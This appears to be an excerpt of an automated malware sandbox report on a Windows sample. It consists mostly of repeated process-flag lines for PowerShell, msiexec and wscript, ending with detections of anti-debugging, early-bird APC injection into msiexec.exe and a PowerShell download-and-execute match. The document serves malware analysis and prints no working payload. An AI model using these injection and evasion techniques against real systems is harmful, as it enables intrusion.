                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5955Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3935Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6972Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2810Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeThread sleep count: Count: 1181 delay: -5Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: bhvF678.tmp.13.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: powershell.exe, 00000002.00000002.1817815417.00000120F0526000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: bhvF678.tmp.13.drBinary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_6852.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
                Maps a DLL or memory area into another process
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000Jump to behavior
